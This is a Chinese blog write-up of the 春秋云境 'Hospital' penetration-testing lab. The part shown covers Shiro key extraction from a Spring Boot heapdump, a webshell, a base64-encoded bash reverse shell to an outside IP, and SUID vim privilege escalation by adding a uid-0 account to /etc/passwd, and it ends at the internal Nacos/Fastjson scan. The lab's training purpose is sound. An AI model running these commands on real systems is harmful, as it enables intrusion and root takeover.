<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="概述在这个场景中，你将扮演一名渗透测试工程师，被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限，以评估公司的网络安全状况。该靶场共有 4 个 flag，分布于不同的靶机。 架构    内网地址 Host or FQDN 简要描述    172.30.12.5 Web01 Spring + Shiro   172.30.12.6 Server02 Nacos   172.30.1">
<meta property="og:type" content="article">
<meta property="og:title" content="春秋云境-Hospital">
<meta property="og:url" content="https://chimedal.github.io/2024/09/30/Hospital/index.html">
<meta property="og:site_name" content="Chimedal">
<meta property="og:description" content="概述在这个场景中，你将扮演一名渗透测试工程师，被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限，以评估公司的网络安全状况。该靶场共有 4 个 flag，分布于不同的靶机。 架构    内网地址 Host or FQDN 简要描述    172.30.12.5 Web01 Spring + Shiro   172.30.12.6 Server02 Nacos   172.30.1">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-2546293eafbdacc576f4eff024b81134_1440w.png">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-25a08160817596f537b369d78973a4ff_1440w.png">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-c9438886e10e22ce429a65ba435a7b10_1440w.png">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-011989bec191546af562df7ec986c444_1440w.png">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-9ea20a54f5d52282327122f93829e96d_1440w.png">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-a48b8d07ff144e60d000b01bd094fb15_1440w.png">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-44c107056a9635991378458ee1aacdec_1440w.png">
<meta property="og:image" content="https://pic1.zhimg.com/80/v2-91cbdaf95d7ace371d6c5d4447b8db80_1440w.png">
<meta property="og:image" content="https://picx.zhimg.com/80/v2-5d471999ae7cd187f262711e8324c01f_1440w.png">
<meta property="article:published_time" content="2024-09-29T16:38:00.000Z">
<meta property="article:modified_time" content="2024-09-29T16:40:00.000Z">
<meta property="article:author" content="Chimedal">
<meta property="article:tag" content="Penetration">
<meta property="article:tag" content="春秋云境">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://picx.zhimg.com/80/v2-2546293eafbdacc576f4eff024b81134_1440w.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.png">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.png">
        
      
    
    <!-- title -->
    <title>春秋云境-Hospital</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/link/">Link</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/09/22/Linux%E6%8F%90%E6%9D%83/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://chimedal.github.io/2024/09/30/Hospital/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://chimedal.github.io/2024/09/30/Hospital/&text=春秋云境-Hospital"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://chimedal.github.io/2024/09/30/Hospital/&is_video=false&description=春秋云境-Hospital"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=春秋云境-Hospital&body=Check out this article: https://chimedal.github.io/2024/09/30/Hospital/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://chimedal.github.io/2024/09/30/Hospital/&title=春秋云境-Hospital"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://chimedal.github.io/2024/09/30/Hospital/&name=春秋云境-Hospital&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://chimedal.github.io/2024/09/30/Hospital/&t=春秋云境-Hospital"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%A6%82%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text">概述</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%89%8D%E6%9C%9F%E4%BF%A1%E6%81%AF%E6%89%93%E7%82%B9"><span class="toc-number">2.</span> <span class="toc-text">前期信息打点</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8-Spring-Boot-Heapdump-Shiro-Deserialization"><span class="toc-number">3.</span> <span class="toc-text">漏洞利用(Spring Boot Heapdump + Shiro Deserialization)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%9D%9E%E9%A2%84%E6%9C%9F-%E7%8C%9Cflag%E5%9C%B0%E5%9D%80"><span class="toc-number">3.1.</span> <span class="toc-text">非预期(猜flag地址)</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E6%AC%A1%E6%80%A7%E6%8F%90%E6%9D%83%EF%BC%8C%E4%B8%8D%E5%A5%BD%E7%94%A8"><span class="toc-number">3.2.</span> <span class="toc-text">一次性提权，不好用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E5%AE%97%E6%8F%90%E6%9D%83%E6%96%B9%E6%B3%95-%E5%8D%87%E7%BA%A7%E4%BA%A4%E4%BA%92%E5%BC%8F%E7%BB%88%E7%AB%AF"><span class="toc-number">3.3.</span> <span class="toc-text">正宗提权方法(升级交互式终端)</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%86%85%E7%BD%91%E6%89%AB%E6%8F%8F"><span class="toc-number">4.</span> <span class="toc-text">内网扫描</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#flag02-Nacos-Client-Yaml-Deserialization"><span class="toc-number">5.</span> <span class="toc-text">flag02(Nacos Client Yaml Deserialization)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#flag03-Fastjson-Deserialization"><span class="toc-number">6.</span> <span class="toc-text">flag03(Fastjson Deserialization)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#flag04-Grafana-Unauthorized-Arbitrary-File-Reading-PostgreSQL-Getshell"><span class="toc-number">7.</span> <span class="toc-text">flag04(Grafana Unauthorized Arbitrary File Reading &amp; PostgreSQL Getshell)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E9%93%BE%E6%8E%A5"><span class="toc-number">8.</span> <span class="toc-text">参考链接</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        春秋云境-Hospital
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Chimedal</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-09-29T16:38:00.000Z" class="dt-published" itemprop="datePublished">2024-09-30</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Penetration/" rel="tag">Penetration</a>, <a class="p-category" href="/tags/%E6%98%A5%E7%A7%8B%E4%BA%91%E5%A2%83/" rel="tag">春秋云境</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="概述"><a href="#概述" class="headerlink" title="概述"></a>概述</h1><p>在这个场景中，你将扮演一名渗透测试工程师，被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限，以评估公司的网络安全状况。该靶场共有 4 个 flag，分布于不同的靶机。</p>
<p>架构<br><img src="https://picx.zhimg.com/80/v2-2546293eafbdacc576f4eff024b81134_1440w.png"></p>
<table>
<thead>
<tr>
<th align="center">内网地址</th>
<th align="center">Host or FQDN</th>
<th align="center">简要描述</th>
</tr>
</thead>
<tbody><tr>
<td align="center">172.30.12.5</td>
<td align="center">Web01</td>
<td align="center">Spring + Shiro</td>
</tr>
<tr>
<td align="center">172.30.12.6</td>
<td align="center">Server02</td>
<td align="center">Nacos</td>
</tr>
<tr>
<td align="center">172.30.12.236 172.30.54.179</td>
<td align="center">Web03</td>
<td align="center">Fastjson</td>
</tr>
<tr>
<td align="center">172.30.54.12</td>
<td align="center">Web04</td>
<td align="center">Grafana + Postgresql</td>
</tr>
</tbody></table>
<h1 id="前期信息打点"><a href="#前期信息打点" class="headerlink" title="前期信息打点"></a>前期信息打点</h1><p>不知道为什么fscan最新版扫不出来8080端口，改成了1.8.2发现可以了</p>
<p>fscan扫描得到如下内容：</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">D:\PenetrationW&gt;.\fscan64 -h 39.99.231.151</span><br><span class="line"></span><br><span class="line">   ___                              _</span><br><span class="line">  / _ \     ___  ___ _ __ __ _  ___| | __</span><br><span class="line"> / /_\/____/ __|/ __| <span class="string">&#x27;__/ _` |/ __| |/ /</span></span><br><span class="line"><span class="string">/ /_\\_____\__ \ (__| | | (_| | (__|   &lt;</span></span><br><span class="line"><span class="string">\____/     |___/\___|_|  \__,_|\___|_|\_\</span></span><br><span class="line"><span class="string">                     fscan version: 1.8.2</span></span><br><span class="line"><span class="string">start infoscan</span></span><br><span class="line"><span class="string">(icmp) Target 39.99.231.151   is alive</span></span><br><span class="line"><span class="string">[*] Icmp alive hosts len is: 1</span></span><br><span class="line"><span class="string">39.99.231.151:22 open</span></span><br><span class="line"><span class="string">39.99.231.151:8080 open</span></span><br><span class="line"><span class="string">[*] alive ports len is: 2</span></span><br><span class="line"><span class="string">start vulscan</span></span><br><span class="line"><span class="string">[*] WebTitle: http://39.99.231.151:8080 code:302 len:0      title:None 跳转url: http://39.99.231.151:8080/login;jsessionid=9823AC0A558D9D6AE0C5066806C444E4</span></span><br><span class="line"><span class="string">[*] WebTitle: http://39.99.231.151:8080/login;jsessionid=9823AC0A558D9D6AE0C5066806C444E4 code:200 len:2005   title:医疗管理后台</span></span><br><span class="line"><span class="string">[+] http://39.99.231.151:8080 poc-yaml-spring-actuator-heapdump-file</span></span><br></pre></td></tr></table></figure></div>
<p>发现jsessionid&#x3D;xxx，明显的Shiro特征，同时发现有acatuator泄露</p>
<p>访问网站，弱口令<code>admin/admin123</code>直接登录了，但是没啥东西</p>
<p>8080端口存在一个网站和<code>heapdump</code>文件，访问<code>/actuator</code>目录</p>
<p>通过目录扫描发现其存在 Spring Boot Heapdump 泄露</p>
<p>&lt;39.99.231.151:8080&#x2F;actuator&#x2F;heapdump&gt;</p>
<p>我们通过<a target="_blank" rel="noopener" href="https://github.com/whwlsfb/JDumpSpider">whwlsfb&#x2F;JDumpSpider</a>对Heapdump文件进行分析，得到 Shiro key</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">D:\PenetrationW\JDumpSpider&gt;java -jar .\JDumpSpider-1.1-SNAPSHOT-full.jar .\heapdump</span><br><span class="line">===========================================</span><br><span class="line">CookieRememberMeManager(ShiroKey)</span><br><span class="line">-------------</span><br><span class="line">algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES</span><br><span class="line"></span><br><span class="line">===========================================</span><br></pre></td></tr></table></figure></div>
<p>得到密钥</p>
<h1 id="漏洞利用-Spring-Boot-Heapdump-Shiro-Deserialization"><a href="#漏洞利用-Spring-Boot-Heapdump-Shiro-Deserialization" class="headerlink" title="漏洞利用(Spring Boot Heapdump + Shiro Deserialization)"></a>漏洞利用(Spring Boot Heapdump + Shiro Deserialization)</h1><p><img src="https://pic1.zhimg.com/80/v2-25a08160817596f537b369d78973a4ff_1440w.png"></p>
<p>生成内存马，蚁剑连接</p>
<p><img src="https://pic1.zhimg.com/80/v2-c9438886e10e22ce429a65ba435a7b10_1440w.png"><br>这个登录不进去，把文件改为jsp后缀可以(php后缀也不行)<br><img src="https://pic1.zhimg.com/80/v2-011989bec191546af562df7ec986c444_1440w.png"></p>
<p>连接过后我们直接反弹 shell</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">bash -c <span class="string">&#x27;&#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjMuMjQ5Ljk5LjcxLzc5OSAwPiYx&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&#x27;</span></span><br><span class="line"><span class="comment"># bash -i &gt;&amp; /dev/tcp/123.249.99.71/799 0&gt;&amp;1</span></span><br></pre></td></tr></table></figure></div>

<p>反弹过后，直接尝试查找 SUID 权限，根据输出发现<code>vim.basic</code>具有<code>S</code>权限，<code>vim.basic</code>可以直接以<code>root</code>身份进行文件编辑</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">app@web01:/$ <span class="built_in">id</span></span><br><span class="line"><span class="built_in">id</span></span><br><span class="line">uid=1000(app) gid=1000(app) <span class="built_in">groups</span>=1000(app)</span><br><span class="line">app@web01:/$ find / -user root -perm -4000 -<span class="built_in">print</span> 2&gt;/dev/null</span><br><span class="line">find / -user root -perm -4000 -<span class="built_in">print</span> 2&gt;/dev/null</span><br><span class="line">/usr/bin/vim.basic</span><br><span class="line">/usr/bin/su</span><br><span class="line">/usr/bin/newgrp</span><br><span class="line">/usr/bin/staprun</span><br><span class="line">/usr/bin/passwd</span><br><span class="line">/usr/bin/gpasswd</span><br><span class="line">/usr/bin/umount</span><br><span class="line">/usr/bin/chfn</span><br><span class="line">/usr/bin/stapbpf</span><br><span class="line">/usr/bin/sudo</span><br><span class="line">/usr/bin/chsh</span><br><span class="line">/usr/bin/fusermount</span><br><span class="line">/usr/bin/mount</span><br><span class="line">/usr/lib/openssh/ssh-keysign</span><br><span class="line">/usr/lib/dbus-1.0/dbus-daemon-launch-helper</span><br><span class="line">/usr/lib/eject/dmcrypt-get-device</span><br></pre></td></tr></table></figure></div>
<h2 id="非预期-猜flag地址"><a href="#非预期-猜flag地址" class="headerlink" title="非预期(猜flag地址)"></a>非预期(猜flag地址)</h2><p><code>vim.basic /root/flag/flag01.txt</code>莫名其妙就出了</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">^C)     O))                              O))             O))</span><br><span class="line">root@hcss-ecs-6260:~#                O)  O))             O))</span><br><span class="line">O))     O))   O))     O)))) O) O))     O)O) O)   O))     O))</span><br><span class="line">O)))))) O)) O))  O)) O))    O)  O)) O))  O))   O))  O))  O))</span><br><span class="line">O))     O))O))    O))  O))) O)   O))O))  O))  O))   O))  O))</span><br><span class="line">O))     O)) O))  O))     O))O)) O)) O))  O))  O))   O))  O))</span><br><span class="line">O))     O))   O))    O)) O))O))     O))   O))   O)) O)))O)))</span><br><span class="line">                            O))</span><br><span class="line">flag01: flag&#123;5dad6d4a-087c-4de3-bb10-f899ac1c69a9&#125;</span><br></pre></td></tr></table></figure></div>
<p>为了后面方便操作，进行提权，输入</p>
<h2 id="一次性提权，不好用"><a href="#一次性提权，不好用" class="headerlink" title="一次性提权，不好用"></a>一次性提权，不好用</h2><div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">vim.basic -c <span class="string">&#x27;:python3 import os; os.execl(&quot;/bin/bash&quot;, &quot;bash&quot;, &quot;-pc&quot;, &quot;reset; exec bash -p&quot;)&#x27;</span></span><br></pre></td></tr></table></figure></div>
<p>就可以这个提权，也可以直接写入root公钥</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vim.basic /root/.ssh/authorized_keys</span><br><span class="line">i</span><br><span class="line">(公钥)</span><br><span class="line">esc : wq!</span><br></pre></td></tr></table></figure></div>
<h2 id="正宗提权方法-升级交互式终端"><a href="#正宗提权方法-升级交互式终端" class="headerlink" title="正宗提权方法(升级交互式终端)"></a>正宗提权方法(升级交互式终端)</h2><p>升级交互式终端，以欺骗某些命令让它们以为在合适的终端运行,vim.basic有suid权限，但是必须有tty，也就是交互式shell</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">python3 -c <span class="string">&quot;import pty;pty.spawn(&#x27;/bin/bash&#x27;)&quot;</span></span><br><span class="line"></span><br><span class="line">script /dev/null -c bash</span><br><span class="line">ctrl+z</span><br><span class="line"><span class="built_in">stty</span> raw -<span class="built_in">echo</span>; <span class="built_in">fg</span></span><br><span class="line">reset</span><br><span class="line"><span class="comment">#xterm-256color</span></span><br><span class="line"><span class="comment">#最后这条命令执行会说命令找不到，不知道为什么</span></span><br></pre></td></tr></table></figure></div>
<p>通过 vim.basic 修改 &#x2F;etc&#x2F;passwd 进行提权</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">openssl passwd -1 -salt 123 123456</span><br><span class="line"><span class="comment"># $1$123$7mft0jKnzzvAdU4t0unTG1</span></span><br></pre></td></tr></table></figure></div>
<p>生成密码<br>在 &#x2F;etc&#x2F;passwd 文件中添加个账户</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/passwd</span><br><span class="line"></span><br><span class="line">hacker:$1$123<span class="variable">$7mft0jKnzzvAdU4t0unTG1</span>:0:0:/root:/bin/bash</span><br><span class="line"></span><br><span class="line"><span class="comment">#退出的时候输入:wq!</span></span><br></pre></td></tr></table></figure></div>

<p>添加之后,su切换到新添加的帐号，这台服务器是 web01，获取 flag01 的值</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">su hacker</span><br></pre></td></tr></table></figure></div>
<p>就有root权限了</p>
<h1 id="内网扫描"><a href="#内网扫描" class="headerlink" title="内网扫描"></a>内网扫描</h1><p>上传 fscan 进行扫描内网网段</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">ifconfig</span><br><span class="line">eth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500</span><br><span class="line">        inet 172.30.12.5  netmask 255.255.0.0  broadcast 172.30.255.255</span><br><span class="line">        inet6 fe80::216:3eff:fe23:29cf  prefixlen 64  scopeid 0x20&lt;<span class="built_in">link</span>&gt;</span><br><span class="line">        ether 00:16:3e:23:29:cf  txqueuelen 1000  (Ethernet)</span><br><span class="line">        RX packets 67492  bytes 95599182 (95.5 MB)</span><br><span class="line">        RX errors 0  dropped 0  overruns 0  frame 0</span><br><span class="line">        TX packets 16889  bytes 2373197 (2.3 MB)</span><br><span class="line">        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</span><br><span class="line"></span><br><span class="line">lo: flags=73&lt;UP,LOOPBACK,RUNNING&gt;  mtu 65536</span><br><span class="line">        inet 127.0.0.1  netmask 255.0.0.0</span><br><span class="line">        inet6 ::1  prefixlen 128  scopeid 0x10&lt;host&gt;</span><br><span class="line">        loop  txqueuelen 1000  (Local Loopback)</span><br><span class="line">        RX packets 784  bytes 68783 (68.7 KB)</span><br><span class="line">        RX errors 0  dropped 0  overruns 0  frame 0</span><br><span class="line">        TX packets 784  bytes 68783 (68.7 KB)</span><br><span class="line">        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0</span><br><span class="line"></span><br><span class="line">./fscan -h 172.30.12.5/24 -hn 172.30.12.5</span><br><span class="line">bash: line 14: ./fscan: Permission denied</span><br><span class="line"><span class="built_in">chmod</span> 777 fscan</span><br><span class="line">./fscan -h 172.30.12.5/24 -hn 172.30.12.5</span><br><span class="line"></span><br><span class="line">   ___                              _    </span><br><span class="line">  / _ \     ___  ___ _ __ __ _  ___| | __ </span><br><span class="line"> / /_\/____/ __|/ __| <span class="string">&#x27;__/ _` |/ __| |/ /</span></span><br><span class="line"><span class="string">/ /_\\_____\__ \ (__| | | (_| | (__|   &lt;    </span></span><br><span class="line"><span class="string">\____/     |___/\___|_|  \__,_|\___|_|\_\   </span></span><br><span class="line"><span class="string">                     fscan version: 1.8.4</span></span><br><span class="line"><span class="string">start infoscan</span></span><br><span class="line"><span class="string">(icmp) Target 172.30.12.236   is alive</span></span><br><span class="line"><span class="string">(icmp) Target 172.30.12.6     is alive</span></span><br><span class="line"><span class="string">[*] Icmp alive hosts len is: 2</span></span><br><span class="line"><span class="string">172.30.12.6:445 open</span></span><br><span class="line"><span class="string">172.30.12.6:139 open</span></span><br><span class="line"><span class="string">172.30.12.6:135 open</span></span><br><span class="line"><span class="string">172.30.12.236:22 open</span></span><br><span class="line"><span class="string">172.30.12.236:8080 open</span></span><br><span class="line"><span class="string">172.30.12.236:8009 open</span></span><br><span class="line"><span class="string">172.30.12.6:8848 open</span></span><br><span class="line"><span class="string">[*] alive ports len is: 7</span></span><br><span class="line"><span class="string">start vulscan</span></span><br><span class="line"><span class="string">[*] NetBios 172.30.12.6     WORKGROUP\SERVER02            </span></span><br><span class="line"><span class="string">[*] NetInfo </span></span><br><span class="line"><span class="string">[*]172.30.12.6</span></span><br><span class="line"><span class="string">   [-&gt;]Server02</span></span><br><span class="line"><span class="string">   [-&gt;]172.30.12.6</span></span><br><span class="line"><span class="string">[*] WebTitle http://172.30.12.236:8080 code:200 len:3964   title:医院后台管理平台</span></span><br><span class="line"><span class="string">[*] WebTitle http://172.30.12.6:8848   code:404 len:431    title:HTTP Status 404 – Not Found</span></span><br><span class="line"><span class="string">[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos </span></span><br><span class="line"><span class="string">[+] PocScan http://172.30.12.6:8848 poc-yaml-alibaba-nacos-v1-auth-bypass</span></span><br></pre></td></tr></table></figure></div>

<p>发现如下两个资产</p>
<div class="highlight-wrap" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http://172.30.12.6:8848 poc-yaml-alibaba-nacos poc-yaml-alibaba-nacos-v1-auth-bypass </span><br><span class="line">http://172.30.12.236:8080 code:200 len:3964   title:医院后台管理平台</span><br></pre></td></tr></table></figure></div>

<p>上传frp进行socks5代理<br>访问<a target="_blank" rel="noopener" href="http://172.30.12.6:8848/nacos/">http://172.30.12.6:8848/nacos/</a></p>
<p>内网<code>172.30.12.6</code>存在一台<code>nacos</code>服务，存在默认密码 <code>nacos/nacos</code><br><a target="_blank" rel="noopener" href="http://172.30.12.236:8080/">http://172.30.12.236:8080</a>是存在fastjson服务</p>
